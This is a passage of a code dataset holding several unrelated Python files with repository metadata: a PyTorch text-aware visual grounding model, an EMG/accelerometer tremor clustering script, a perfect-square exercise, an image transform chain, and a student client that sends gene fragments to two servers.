st_relevance_score[batch_i][ii].item()\n # grid softmax\n for batch_i in range(batch_size):\n if not len(torch.nonzero(activation_map[batch_i])) == 0:\n tmp = activation_map[batch_i]\n tmp = tmp.reshape(-1, 1)\n tmp = F.softmax(tmp*9, dim=0)\n tmp = tmp.reshape(visu_scale, visu_scale, -1)\n activation_map[batch_i] = tmp\n return activation_map\n\n\ndef generate_coord(batch, height, width):\n xv, yv = torch.meshgrid([torch.arange(0,height), torch.arange(0,width)])\n xv_min = (xv.float()*2 - width)/width\n yv_min = (yv.float()*2 - height)/height\n xv_max = ((xv+1).float()*2 - width)/width\n yv_max = ((yv+1).float()*2 - height)/height\n xv_ctr = (xv_min+xv_max)/2\n yv_ctr = (yv_min+yv_max)/2\n hmap = torch.ones(height,width)*(1./height)\n wmap = torch.ones(height,width)*(1./width)\n coord = torch.autograd.Variable(torch.cat([xv_min.unsqueeze(0), yv_min.unsqueeze(0),\\\n xv_max.unsqueeze(0), yv_max.unsqueeze(0),\\\n xv_ctr.unsqueeze(0), yv_ctr.unsqueeze(0),\\\n hmap.unsqueeze(0), wmap.unsqueeze(0)], dim=0).cuda())\n coord = coord.unsqueeze(0).repeat(batch,1,1,1)\n return coord\n\n\nclass cross_attention_head(nn.Module):\n def __init__(self, emb_size=256, tunebert=False, convlstm=False, bert_model='bert-base-uncased', leaky=False, \\\n jemb_drop_out=0.1,raw_feature_norm='softmax',NCatt=2,down_sample_ith=2,fpn_n=3,sub_step=2,n_head=3):\n super(cross_attention_head, self).__init__()\n\n self.down_sample_ith = down_sample_ith\n self.fpn_n = fpn_n\n self.emb_size = emb_size\n self.NCatt = NCatt\n self.sub_step = sub_step\n self.tunebert = tunebert\n self.raw_feature_norm = raw_feature_norm\n if bert_model=='bert-base-uncased':\n self.textdim=768\n else:\n self.textdim=1024\n self.convlstm = convlstm\n ## Visual model\n self.visumodel = Darknet(config_path='./model/yolov3.cfg')\n self.visumodel.load_weights('./saved_models/yolov3.weights')\n ## Text model\n self.textmodel = BertModel.from_pretrained(bert_model)\n self.mapping_visu = ConvBatchNormReLU(256, emb_size, 1, 1, 0, 1, leaky=leaky)\n self.mapping_lang = torch.nn.Sequential(\n nn.Linear(self.textdim, emb_size),\n nn.ReLU(),\n nn.Dropout(jemb_drop_out),\n nn.Linear(emb_size, emb_size),\n nn.ReLU(),)\n self.txt_single_classifier = ConvBatchNormReLU(emb_size*2, 1, 1, 1, 0, 1, leaky=leaky)\n self.softmax = nn.Softmax()\n self.bn =nn.BatchNorm2d(emb_size)\n self.cross_att_modulesdict = nn.ModuleDict()\n output_emb = emb_size\n modules = OrderedDict()\n modules['convmerge0_1x1'] = ConvBatchNormReLU(emb_size * 2, emb_size, 1, 1, 0, 1)\n modules['convmerge1_1x1'] = ConvBatchNormReLU(emb_size * 2, emb_size, 1, 1, 0, 1)\n for i in range(fpn_n-1):\n modules['conv%d_downsample'%i] = torch.nn.Sequential(\n ConvBatchNormReLU(emb_size, emb_size, 1, 1, 0, 1),\n nn.MaxPool2d(2,2))\n modules['fcn'] = torch.nn.Sequential(\n ConvBatchNormReLU(output_emb*2, output_emb, 1, 1, 0, 1, leaky=leaky),\n nn.Conv2d(output_emb, 9*5, kernel_size=1))\n modules['fcn_sub'] = torch.nn.Sequential(\n ConvBatchNormReLU(output_emb*2, output_emb, 1, 1, 0, 1, leaky=leaky),\n nn.Conv2d(output_emb, 9*5, kernel_size=1))\n modules['fcn_2sub'] = torch.nn.Sequential(\n ConvBatchNormReLU(output_emb*2, output_emb, 1, 1, 0, 1, leaky=leaky),\n nn.Conv2d(output_emb, 9*5, kernel_size=1))\n kn = 0\n for _ in range(0,self.fpn_n):\n for _ in range(self.sub_step):\n modules['catt%d'%kn] = cross_att_blocked(raw_feature_norm=raw_feature_norm,head=n_head)\n modules['linear%d'%kn] = nn.Linear(1024,emb_size)\n modules['conv%d_1x1'%kn] = ConvBatchNormReLU(emb_size*2, emb_size, 1, 1, 0, 1)\n 
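generate_coord above builds an 8-channel CoordConv-style location map for each grid cell: normalized x/y extents in [-1, 1], cell centers, and constant 1/h and 1/w channels. A CPU-only sketch of the same layout on a tiny grid (the .cuda() call and the original's Variable wrapper are dropped here so it runs anywhere):

import torch

def generate_coord_cpu(batch, height, width):
    ys, xs = torch.meshgrid(torch.arange(height), torch.arange(width), indexing="ij")
    xs, ys = xs.float(), ys.float()
    x_min, x_max = (xs * 2 - width) / width, ((xs + 1) * 2 - width) / width
    y_min, y_max = (ys * 2 - height) / height, ((ys + 1) * 2 - height) / height
    coord = torch.stack([
        x_min, y_min, x_max, y_max,
        (x_min + x_max) / 2, (y_min + y_max) / 2,   # cell centers
        torch.full_like(xs, 1.0 / height),          # constant 1/h channel
        torch.full_like(xs, 1.0 / width),           # constant 1/w channel
    ])
    return coord.unsqueeze(0).repeat(batch, 1, 1, 1)

c = generate_coord_cpu(1, 2, 2)
print(c.shape)   # torch.Size([1, 8, 2, 2])
print(c[0, 0])   # x_min per cell: [[-1., 0.], [-1., 0.]]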
modules['conv%d_3x3'%kn] = ConvBatchNormReLU(emb_size, emb_size, 3, 1, 1, 1)\n kn += 1\n\n self.cross_att_modulesdict.update(modules)\n\n\n def forward(self, image, word_id, word_mask, word_st_position, bbox_st_list, word_id_st_sent, word_mask_st_sent, st_list_bbox2word):\n\n ## Visual Module\n batch_size = image.size(0)\n raw_fvisu = self.visumodel(image)\n if self.convlstm:\n raw_fvisu = raw_fvisu[1]\n else:\n raw_fvisu_8x8 = raw_fvisu[0]\n raw_fvisu_16x16 = raw_fvisu[1]\n raw_fvisu = raw_fvisu[2]\n\n ## Language Module for scene text\n all_encoder_layers_st_sent, _ = self.textmodel(word_id_st_sent, token_type_ids=None, attention_mask=word_mask_st_sent)\n raw_flang_st_sent = (all_encoder_layers_st_sent[-1][:, 0, :] + all_encoder_layers_st_sent[-2][:, 0, :] +\n all_encoder_layers_st_sent[-3][:, 0, :] + all_encoder_layers_st_sent[-4][:, 0, :]) / 4\n raw_fword_st_sent = (all_encoder_layers_st_sent[-1] + all_encoder_layers_st_sent[-2] +\n all_encoder_layers_st_sent[-3] + all_encoder_layers_st_sent[-4]) / 4\n if not self.tunebert:\n hidden_st_sent = raw_flang_st_sent.detach()\n raw_fword_st_sent = raw_fword_st_sent.detach()\n\n ## Language Module for expression\n all_encoder_layers, _ = self.textmodel(word_id, \\\n token_type_ids=None, attention_mask=word_mask)\n ## Sentence feature at the first position [cls]\n raw_flang = (all_encoder_layers[-1][:,0,:] + all_encoder_layers[-2][:,0,:]\\\n + all_encoder_layers[-3][:,0,:] + all_encoder_layers[-4][:,0,:])/4\n raw_fword = (all_encoder_layers[-1] + all_encoder_layers[-2]\\\n + all_encoder_layers[-3] + all_encoder_layers[-4])/4\n if not self.tunebert:\n ## fix bert during training\n # raw_flang = raw_flang.detach()\n hidden = raw_flang.detach()\n raw_fword = raw_fword.detach()\n\n ## Correlatd Text Extraction & Correlated Region Activation\n mask_word_att = torch.zeros_like(raw_fword).cuda()\n mask_st_att = torch.zeros_like(raw_fword_st_sent).cuda()\n for ii in range(batch_size):\n mask_word_att[ii, 1:len(torch.nonzero(word_mask[ii])) - 1, :] = 1\n mask_st_att[ii, 1:len(torch.nonzero(word_id_st_sent[ii])) - 1, :] = 1\n raw_fword_attn = raw_fword * mask_word_att\n raw_fword_st_sent = raw_fword_st_sent * mask_st_att\n st_relevance_score = torch.zeros(batch_size, mask_st_att.size(1), mask_word_att.size(1)).cuda()\n\n THRES_PHI = 0.50\n for ii in range(batch_size):\n st_relevance_score[ii] = F.cosine_similarity(raw_fword_st_sent[ii].unsqueeze(1), raw_fword_attn[ii], dim=-1)\n st_relevance_score = torch.max(st_relevance_score, dim=2, keepdim=True).values\n st_relevance_score = torch.where(st_relevance_score < THRES_PHI, torch.zeros_like(st_relevance_score), st_relevance_score)\n\n weighted_st_feature_8x8 = st_grid_calculation(st_relevance_score, word_st_position, bbox_st_list, word_id_st_sent, st_list_bbox2word, raw_fvisu_8x8.size(2), image.size(2))\n raw_fvisu_8x8 = raw_fvisu_8x8.permute(0,2,3,1).contiguous() * weighted_st_feature_8x8 + raw_fvisu_8x8.permute(0,2,3,1).contiguous()\n raw_fvisu_8x8 = raw_fvisu_8x8.permute(0,3,1,2).contiguous()\n\n weighted_st_feature_16x16 = st_grid_calculation(st_relevance_score, word_st_position, bbox_st_list, word_id_st_sent, st_list_bbox2word, raw_fvisu_16x16.size(2), image.size(2))\n raw_fvisu_16x16 = raw_fvisu_16x16.permute(0,2,3,1).contiguous() * weighted_st_feature_16x16 + raw_fvisu_16x16.permute(0,2,3,1).contiguous()\n raw_fvisu_16x16 = raw_fvisu_16x16.permute(0,3,1,2).contiguous()\n\n weighted_st_feature_32x32 = st_grid_calculation(st_relevance_score, word_st_position, bbox_st_list, word_id_st_sent, 
st_list_bbox2word, raw_fvisu.size(2),image.size(2))\n raw_fvisu = raw_fvisu.permute(0,2,3,1).contiguous() * weighted_st_feature_32x32 + raw_fvisu.permute(0,2,3,1).contiguous()\n raw_fvisu = raw_fvisu.permute(0,3,1,2).contiguous()\n\n ## Language Module - mapping language feature\n fword = Variable(torch.zeros(raw_fword.shape[0], raw_fword.shape[1], self.emb_size).cuda())\n for ii in range(raw_fword.shape[0]):\n ntoken = (word_mask[ii] != 0).sum()\n fword[ii, :ntoken, :] = F.normalize(self.mapping_lang(raw_fword[ii, :ntoken, :]), p=2, dim=1)\n raw_fword = fword\n global_raw_fword = raw_fword.mean(1)\n\n ## Visual Module - mapping visual feature & decomposition\n fvisu = self.mapping_visu(raw_fvisu)\n raw_fvisu = F.normalize(fvisu, p=2, dim=1) # 32x32\n raw_fvisu_16x16 = F.normalize(raw_fvisu_16x16, p=2, dim=1) # 16x16\n raw_fvisu_8x8 = raw_fvisu_8x8.view(batch_size, raw_fvisu_8x8.size(1), -1).transpose(1,2).contiguous()\n raw_fvisu_8x8 = F.max_pool1d(raw_fvisu_8x8, 2).transpose(1, 2).contiguous().view(batch_size, -1, 8, 8)\n raw_fvisu_8x8 = F.normalize(raw_fvisu_8x8, p=2, dim=1) # 8x8\n\n map_fvisu = raw_fvisu.view(batch_size, raw_fvisu.size(1), -1)\n map_fvisu_orig = torch.transpose(map_fvisu, 1, 2).contiguous()\n map_fvisu_16x16 = raw_fvisu_16x16.view(batch_size, raw_fvisu_16x16.size(1), -1)\n map_fvisu_16x16 = torch.transpose(map_fvisu_16x16, 1, 2).contiguous()\n map_fvisu_8x8 = raw_fvisu_8x8.view(batch_size, raw_fvisu_8x8.size(1), -1)\n map_fvisu_8x8 = torch.transpose(map_fvisu_8x8, 1, 2).contiguous()\n map_fvisu_orig_co = map_fvisu_orig.clone()\n\n ## Visual Module - location feature\n coord = generate_coord(batch_size, raw_fvisu.size(2), raw_fvisu.size(3))\n coord_16x16 = generate_coord(batch_size, raw_fvisu_16x16.size(2), raw_fvisu_16x16.size(3))\n coord_8x8 = generate_coord(batch_size, raw_fvisu_8x8.size(2), raw_fvisu_8x8.size(3))\n\n map_coord = coord.view(batch_size, coord.size(1), -1)\n map_coord = torch.transpose(map_coord, 1, 2).contiguous()\n map_coord_16x16 = coord_16x16.view(batch_size, coord_16x16.size(1), -1)\n map_coord_16x16 = torch.transpose(map_coord_16x16, 1, 2).contiguous()\n map_coord_8x8 = coord_8x8.view(batch_size, coord_8x8.size(1), -1)\n map_coord_8x8 = torch.transpose(map_coord_8x8, 1, 2).contiguous()\n\n ## Initialization for bottom-up and bidirectional fusion\n make_f = []\n make_target_visu = []\n make_target_txt = []\n out_feat = []\n cosine_weights = []\n contrast_visu = 0\n contrast_txt = 0\n cosine_txt_word, cosine_txt_visu = None, None\n map_fvisu_add = map_fvisu_orig\n map_coord_add = map_coord\n raw_fvisu_add = raw_fvisu\n out_visu = 0\n merge_t = 0\n att_n = 0\n\n for ff in range(self.fpn_n): # for multi-scale visual features\n for n in range(self.sub_step): # for multi-step alignment\n if ff != 0 or n != 0:\n out_visu = merge_f.view(batch_size, raw_fvisu.size(1), -1)\n out_visu = torch.transpose(out_visu, 1, 2).contiguous()\n out_visu, out_txt, cosine_txt_region, cosine_visu_region, cosine_txt_word, cosine_txt_visu = self.cross_att_modulesdict['catt%d'%att_n](out_visu+map_fvisu_add, merge_t+raw_fword, map_coord_add,cosine_txt_word, cosine_txt_visu, word_mask)\n\n out_visu = out_visu + global_raw_fword.unsqueeze(1)\n out_visu = torch.transpose(out_visu, 1, 2).contiguous()\n out_visu = out_visu.view(batch_size,raw_fvisu_add.size(1),raw_fvisu_add.size(2),raw_fvisu_add.size(3))\n merge_f = torch.cat([raw_fvisu_add+contrast_visu,out_visu],dim=1)\n merge_f = self.cross_att_modulesdict['conv%d_1x1'%att_n](merge_f)\n merge_f = 
self.cross_att_modulesdict['conv%d_3x3'%att_n](merge_f)\n merge_t = torch.cat([raw_fword+contrast_txt,out_txt],dim=-1)\n merge_t = self.cross_att_modulesdict['linear%d'%att_n](merge_t)\n make_target_visu.extend(cosine_visu_region)\n make_target_txt.extend(cosine_txt_region)\n make_f.append(merge_f)\n att_n += 1\n if ff == 0:\n max_feature_32x32 = torch.stack(make_f[:self.sub_step],-1).sum(-1)\n merge_f = self.cross_att_modulesdict['conv0_downsample'](max_feature_32x32)\n raw_fvisu_add = raw_fvisu_16x16\n map_fvisu_add = map_fvisu_16x16\n map_coord_add = map_coord_16x16\n\n elif ff == 1:\n max_feature_16x16 = torch.stack(make_f[self.sub_step:self.sub_step*(ff+1)],-1).sum(-1)\n merge_f = self.cross_att_modulesdict['conv1_downsample'](max_feature_16x16)\n raw_fvisu_add = raw_fvisu_8x8\n map_fvisu_add = map_fvisu_8x8\n map_coord_add = map_coord_8x8\n if ff == self.fpn_n - 1 and n == self.sub_step - 1:\n max_feature_8x8 = torch.stack(make_f[self.sub_step*ff:],-1).sum(-1)\n upsampling1 = nn.UpsamplingNearest2d(scale_factor=2)\n fpn_region_16x16 = upsampling1(max_feature_8x8)\n fpn_region_16x16 = torch.cat([max_feature_16x16, fpn_region_16x16], dim=1)\n fpn_region_16x16 = self.cross_att_modulesdict['convmerge0_1x1'](fpn_region_16x16)\n fpn_region_32x32 = upsampling1(fpn_region_16x16)\n fpn_region_32x32 = torch.cat([max_feature_32x32, fpn_region_32x32], dim=1)\n fpn_region_32x32 = self.cross_att_modulesdict['convmerge1_1x1'](fpn_region_32x32)\n\n out_region_32x32 = self.cross_att_modulesdict['fcn'](torch.cat([fpn_region_32x32, raw_fvisu], dim=1))\n out_region_16x16 = self.cross_att_modulesdict['fcn_sub'](torch.cat([fpn_region_16x16, raw_fvisu_16x16], dim=1))\n out_region_8x8 = self.cross_att_modulesdict['fcn_2sub'](torch.cat([max_feature_8x8, raw_fvisu_8x8], dim=1))\n\n single_conf = self.txt_single_classifier(torch.cat([max_feature_32x32,raw_fvisu],dim=1)).view(batch_size,map_fvisu_orig_co.size(1))\n single_conf_16 = self.txt_single_classifier(torch.cat([max_feature_16x16,raw_fvisu_16x16],dim=1)).view(batch_size,16*16)\n single_conf_8 = self.txt_single_classifier(torch.cat([max_feature_8x8,raw_fvisu_8x8],dim=1)).view(batch_size,8*8)\n out_feat.extend([out_region_32x32,out_region_16x16,out_region_8x8])\n cosine_weights.extend([make_target_visu,make_target_txt,word_mask,single_conf,single_conf_16,single_conf_8])\n\n return out_feat, cosine_weights\n\n\ndef cosine_similarity(x1, x2, dim=1, eps=1e-8):\n \"\"\"Returns cosine similarity between x1 and x2, computed along dim.\"\"\"\n w12 = torch.sum(x1 * x2, dim)\n w1 = torch.norm(x1, 2, dim)\n w2 = torch.norm(x2, 2, dim)\n return (w12 / (w1 * w2).clamp(min=eps))\n\n\ndef l2norm(X, dim, eps=1e-8):\n \"\"\"L2-normalize columns of X\n \"\"\"\n norm = torch.pow(X, 2).sum(dim=dim, keepdim=True).sqrt() + eps\n X = torch.div(X, norm)\n return X\n\n\ndef l1norm(X, dim, eps=1e-8):\n \"\"\"L1-normalize columns of X\n \"\"\"\n norm = torch.abs(X).sum(dim=dim, keepdim=True) + eps\n X = torch.div(X, norm)\n return X\n\n\ndef func_attention(query, context, raw_feature_norm, smooth=9, eps=1e-8, weight=None):\n \"\"\"\n query: (n_context, queryL, d)\n context: (n_context, sourceL, d)\n \"\"\"\n batch_size_q, queryL = query.size(0), query.size(1)\n batch_size, sourceL = context.size(0), context.size(1)\n\n\n # Get attention\n # --> (batch, d, queryL)\n queryT = torch.transpose(query, 1, 2)\n\n # (batch, sourceL, d)(batch, d, queryL)\n # --> (batch, sourceL, queryL)\n attn = torch.bmm(context, queryT)\n\n if raw_feature_norm == \"softmax\":\n # --> (batch*sourceL, 
queryL)\n attn = attn.view(batch_size*sourceL, queryL)\n attn = F.softmax(attn, dim=1)\n # --> (batch, sourceL, queryL)\n attn = attn.view(batch_size, sourceL, queryL)\n elif raw_feature_norm == \"l2norm\":\n attn = l2norm(attn, 2)\n elif raw_feature_norm == \"clipped_l2norm\":\n attn = nn.LeakyReLU(0.1)(attn)\n attn = l2norm(attn, 2)\n elif raw_feature_norm == \"l1norm\":\n attn = l1norm(attn, 2)\n elif raw_feature_norm == \"clipped_l1norm\":\n attn = nn.LeakyReLU(0.1)(attn)\n attn = l1norm(attn, 2)\n elif raw_feature_norm == \"clipped\":\n attn = nn.LeakyReLU(0.1)(attn)\n elif raw_feature_norm == \"no_norm\":\n pass\n else:\n raise ValueError(\"unknown first norm type:\", raw_feature_norm)\n\n if weight is not None:\n attn = attn + weight\n\n attn_out = attn.clone()\n\n # --> (batch, queryL, sourceL)\n attn = torch.transpose(attn, 1, 2).contiguous()\n # --> (batch*queryL, sourceL)\n attn = attn.view(batch_size*queryL, sourceL)\n\n attn = F.softmax(attn*smooth, dim=1)\n # --> (batch, queryL, sourceL)\n attn = attn.view(batch_size, queryL, sourceL)\n # --> (batch, sourceL, queryL)\n attnT = torch.transpose(attn, 1, 2).contiguous()\n\n # --> (batch, d, sourceL)\n contextT = torch.transpose(context, 1, 2)\n # (batch x d x sourceL)(batch x sourceL x queryL)\n # --> (batch, d, queryL)\n weightedContext = torch.bmm(contextT, attnT)\n # --> (batch, queryL, d)\n weightedContext = torch.transpose(weightedContext, 1, 2)\n\n return weightedContext, attn_out\n","repo_name":"Buki2/STAN","sub_path":"model/grounding_model.py","file_name":"grounding_model.py","file_ext":"py","file_size_in_byte":19292,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"36789678493","text":"import matplotlib.pyplot as plt\n# ^^^ pyforest auto-imports - don't write above this line\nimport scipy.io\nimport pandas as pd\nimport preprocessing_helper\nimport feature_extraction\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.decomposition import PCA\n\ndirectory_validation = 'D:\\\\Work\\\\Oxford\\\\Data\\\\TIM\\\\'\ndirectory_acc = 'D:\\\\Work\\\\Oxford\\\\Data\\\\ACC\\\\'\ndirectory_emg = 'D:\\\\Work\\\\Oxford\\\\Data\\\\EMG\\\\'\n\nsampling_rate=1000\n\n\n# In[4]:\n\n#Here for having overlapping regions do sliding = True. 
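func_attention above is the core cross-attention primitive: raw scores from a batched matmul, an optional first normalization over the source axis, then a smoothed softmax over source positions before pooling the context. A compact, self-contained trace of the softmax variant (smooth=9, matching the default used in this model):

import torch
import torch.nn.functional as F

batch, queryL, sourceL, d = 2, 3, 5, 4
query = torch.randn(batch, queryL, d)
context = torch.randn(batch, sourceL, d)

attn = torch.bmm(context, query.transpose(1, 2))                     # (batch, sourceL, queryL)
attn = F.softmax(attn.view(batch * sourceL, queryL), dim=1).view(batch, sourceL, queryL)
attn = attn.transpose(1, 2).contiguous()                             # (batch, queryL, sourceL)
attn = F.softmax(attn.view(batch * queryL, sourceL) * 9, dim=1).view(batch, queryL, sourceL)

weighted = torch.bmm(attn, context)                                  # (batch, queryL, d)
assert weighted.shape == (batch, queryL, d)
assert torch.allclose(attn.sum(-1), torch.ones(batch, queryL))       # rows sum to 1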
And if you want to have 4 sec sliding then seconds = 1\ninput_acc, envelope_acc, instantaneous_freq = preprocessing_helper.ThreeAxisACC(directory_acc,sampling_rate,sliding=False,seconds=1)\ninput_emg, envelope_emg = preprocessing_helper.ThreeAxisEMG(directory_emg,sampling_rate,sliding=False,seconds=1)\n\n\n# In[6]:\n\n#incase you want to save the dataset\n\"\"\"np.save(\"accS\",arr = np.array(input_acc))\nnp.save(\"acc_envelopeS\",arr = np.array(envelope_acc))\nnp.save(\"acc_instantaneous_freqS\",arr = np.array(instantaneous_freq))\nnp.save(\"emgS\",arr = np.array(input_emg))\nnp.save(\"emg_envelopeS\",arr = np.array(envelope_emg))\"\"\"\n#sys.modules[__name__].__dict__.clear()\n\n\n# In[9]:\n\n#Calculating FEATURES\nacc_feature_withoutenvelope = feature_extraction.featureACC(np.array(input_acc),cover= False,sampling_rate=sampling_rate)\nacc_feature_withenvelope = feature_extraction.featureACC(np.array(envelope_acc),cover= True,sampling_rate=sampling_rate)\nTSI = feature_extraction.TSI_feature(np.array(instantaneous_freq))\nTSI = np.expand_dims(TSI, axis=2)\nemg_feature_withoutenvelope = feature_extraction.featureEMG(np.array(input_emg),cover= True,sampling_rate=sampling_rate)\nemg_feature_withenvelope = feature_extraction.featureEMG(np.array(envelope_emg),cover= False,sampling_rate=sampling_rate)\n\n# In[14]:\n\nprint(acc_feature_withoutenvelope.shape)\nprint(acc_feature_withenvelope.shape)\nprint(TSI.shape)\nprint(emg_feature_withoutenvelope.shape)\nprint(emg_feature_withenvelope.shape)\n\n# In[15]:\n\ndata_temp = np.concatenate((acc_feature_withoutenvelope, acc_feature_withenvelope, TSI,emg_feature_withoutenvelope,emg_feature_withenvelope), axis=2)\nprint(data_temp.shape)\nprint(data_temp.shape[0])#patient\nprint(data_temp.shape[1])#axis\nprint(data_temp.shape[2])#features\nprint(data_temp.shape[3])#instances\n\n#Z-Normalization\nfor i in range(data_temp.shape[2]):\n data_temp[:,:,i,:] = (data_temp[:,:,i,:] - data_temp[:,:,i,:].mean())/data_temp[:,:,i,:].std()\n#Checking\nprint(data_temp[:,:,0,:].mean())\nprint(data_temp[:,:,0,:].std())\n\n# In[21]:\n\nprint(data_temp.shape)\n#now have to convert into shape=(instances x features)\nprint(data_temp.shape[0]*data_temp.shape[1]*data_temp.shape[3])\n\nneu = preprocessing_helper.AllPersonAllaxis(data_temp)\nprint(neu.shape)\ndef show_data(X):\n plt.plot(X)#,\"r.\")\n #plt.plot(a)\n plt.ylabel(\"Data values\")\n plt.xlabel(\"Instances\")\n plt.show()\nshow_data(neu)\n\n# In[23]:\n\n#Finding optimal parameters for clustering\nn_clusters = preprocessing_helper.optimal_cluster_value(neu)\neps_finalVal = preprocessing.optimal_eps_value(neu,n_clusters)\nfinal_cluster = preprocessing_helper.DB_cluster(neu,eps_finalVal,n_clusters)\n\n# In[30]:\n\nclustering = DBSCAN(eps=eps_finalVal, min_samples=final_cluster).fit(neu)\ncluster=clustering.labels_\nprint(len(set(cluster)))\nunique, counts = np.unique(cluster, return_counts=True)\ndict(zip(unique, counts))\n\n\n# In[32]:\n\n\n\"\"\"def show_clusters(X,cluster):\n df=pd.DataFrame(dict(x=X[:,0],y=X[:,1], label=cluster))\n colors = {-1:'red',0:'blue',1:'orange',2:'green',3:'skyblue',4:'black'}\n fig,ax=plt.subplots(figsize=(8,8))\n grouped = df.groupby('label')\n \n for key, group in grouped:\n group.plot(ax=ax, kind='scatter',x='x',y='y',label=key ,color=colors[key])\n plt.xlabel(\"feature 0\")\n plt.ylabel(\"feature 1\")\n plt.show()\nshow_clusters(neu,cluster)\"\"\"\n\n\n# In[35]:\n\n#PCA for plotting\n# as PCA maximizes variance so normalization is a must\npca = PCA(.95)\n#pca= 
PCA(n_components=2)\npca.fit(neu)#shape (n_samples, n_features)\ntrain_img = pca.transform(neu)\n\n# In[34]:\n\nprint(train_img.shape)\nprint(pca.components_.shape)\n\n#Variance and important components\nprint(pca.explained_variance_ratio_)\nn_pcs= pca.components_.shape[0]\nmost_important = [np.abs(pca.components_[:][i]).argmax() for i in range(n_pcs)]\nprint(most_important)\n\n# In[37]:\n\n\"\"\"# number of components\nn_pcs= pca.components_.shape[0]\n\n# get the index of the most important feature on EACH component i.e. largest absolute value\n# using LIST COMPREHENSION HERE\nmost_important = [np.abs(pca.components_[:][i]).argmax() for i in range(n_pcs)]\ninitial_feature_names = ['0','1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30']\n\n# get the names\nmost_important_names = [initial_feature_names[most_important[i]] for i in range(n_pcs)]\n\n# using LIST COMPREHENSION HERE AGAIN\ndic = {'PC{}'.format(i+1): most_important_names[i] for i in range(n_pcs)}\n\n# build the dataframe\ndf = pd.DataFrame(sorted(dic.items()))\nprint(df)\"\"\"\n\n\n# In[38]:\n\n\ndef show_clusters(X,cluster):\n df=pd.DataFrame(dict(x=X[:,0],y=X[:,1], label=cluster))\n colors = {-1:'red',0:'blue',1:'orange',2:'green',3:'skyblue',4:'black',5:'purple'}\n fig,ax=plt.subplots(figsize=(8,8))\n grouped = df.groupby('label')\n \n for key, group in grouped:\n group.plot(ax=ax, kind='scatter',x='x',y='y',label=key ,color=colors[key])\n plt.xlabel(\"feature 0\")\n plt.ylabel(\"feature 1\")\n plt.show()\nshow_clusters(train_img,cluster)","repo_name":"IamMRM/Stimulating-States-of-Parkinsonian-Tremor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32661370469","text":"import sys\n\nn, m = map(int ,sys.stdin.readline().split())\nstart = 1\nresult = []\n\n# 1부터 시작하여 해당 숫자의 제곱수를 비교\nwhile start :\n # 만약 m을 넘어선 제곱수이면 루프문 탈출\n if start**2 > m :\n break\n \n # n이상 m이하의 제곱수이면 리스트에 추가\n if n <= start**2 <= m :\n result.append(start**2)\n \n start += 1\n\n# 제곱수 리스트 중 최소값과, 총 제곱수들의 합을 구함\nprint(result[0], sum(result))\n\n# https://level.goorm.io/exam/43116/%EC%99%84%EC%A0%84-%EC%A0%9C%EA%B3%B1%EC%88%98/quiz/1","repo_name":"KimHyungkeun/Algorithm","sub_path":"SWcodingTest/4day/완전제곱수.py","file_name":"완전제곱수.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71638895507","text":"'''\nTransform chain that provides polygons for shadows in an autocalibrated scene\n'''\n\nfrom aether.core import AetherTransformChain\n\nclass ShadowPolyChain(AetherTransformChain):\n\n\t#Transforms in this chain: names and their type\n\ttransforms={'camera':'CVMatPyGameSurface',\n\t 'cv_camera':'CVCamera',\n\t 'bgr2gray':'CVTColor',\n\t 'perspective':'CVPerspective',\n\t 'threshold':'CVThreshold',\n\t 'shadow':'ShadowPolys',\n\t 'invert':'CVInvert'\n\t }\n\n\t#Dependences from transform to transform, referenced by names defined in the 'transforms' field\n\ttransform_deps={'shadow':('threshold',),\n\t 'threshold':('invert',),\n\t 'invert':('perspective',),\n\t 'perspective':('bgr2gray',),\n\t 'bgr2gray':('cv_camera',)\n\t }\n\t#transform_deps={'shadow':('threshold',),'threshold':('perspective',),'perspective':('bgr2gray',),'bgr2gray':('cv_camera',)}\n\n\t#Defines the name of the start of the chain\n\t#This should be 
automatically calculated somehow\n\t#Possibly by building a graph of the deps, toplolgically sorting the graph, and taking the nodes that nothing depends on\n\t#For now this is explicitly defined\n\tstart='shadow'\n","repo_name":"lamielle/aether","sub_path":"src/aether/chain/ShadowPolyChain.py","file_name":"ShadowPolyChain.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30285247799","text":"# -- Write a python program that takes 10 fragments of 10 bases each from\n# -- the FRAT1 gene and sends them to two servers. The odd segments\n# -- (1,3,5,7 and 9) should be sent to server 1, and the even segments\n# -- (2,4,6,8 and 10) to server 2. The client should print on the console\n# -- all the fragments\n\nfrom Client0 import Client\nfrom Seq1 import Seq\n\nPRACTICE = 2\nEXERCISE = 7\n\nprint(f\"-----| Practice {PRACTICE}, Exercise {EXERCISE} |------\")\n\n# -- Parameters of the server to talk to\nIP = \"192.168.1.42\"\nPORT1 = 8080\nPORT2 = 8081\nc1 = Client(IP, PORT1)\nc2 = Client(IP, PORT2)\nprint(c1)\nprint(c2)\ns = Seq()\ns.read_fasta(\"../SESSION-04/FRAT1.txt\")\ns1 = str(s)\nmessage = \"Sending FRAT1 Gene to the server, in fragments of 10 bases...\"\n\n\ndef cutting_fragments(n1, n2, sqq1):\n string = \"\"\n for index in range(n1, n2):\n string = string + sqq1[index]\n return string\n\n\ndef list_fragments(k, sq1):\n list1 = []\n for index in range(1, k + 1):\n n1 = 10 * (index - 1)\n n2 = 10 * index\n a = cutting_fragments(n1, n2, sq1)\n list1.append(a)\n return list1\n\n\nnumber_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nlistfrags = list_fragments(10, s1)\neverything = dict(zip(number_list, listfrags))\nlistvalues = list(everything.values())\neven_list = [2, 4, 6, 8, 10]\nodd_list = [1, 3, 5, 7, 9]\nprint(f\"Gene FRAT1: {s1}\")\nfor key in everything:\n print(f\"Fragment {key}: {everything[key]}\")\n\nc1.talk(message)\nc2.talk(message)\n\nfor i in even_list:\n c2.talk(f\" Fragment {i}: {everything[i]}\")\nfor i in odd_list:\n c1.talk(f\" Fragment {i}: 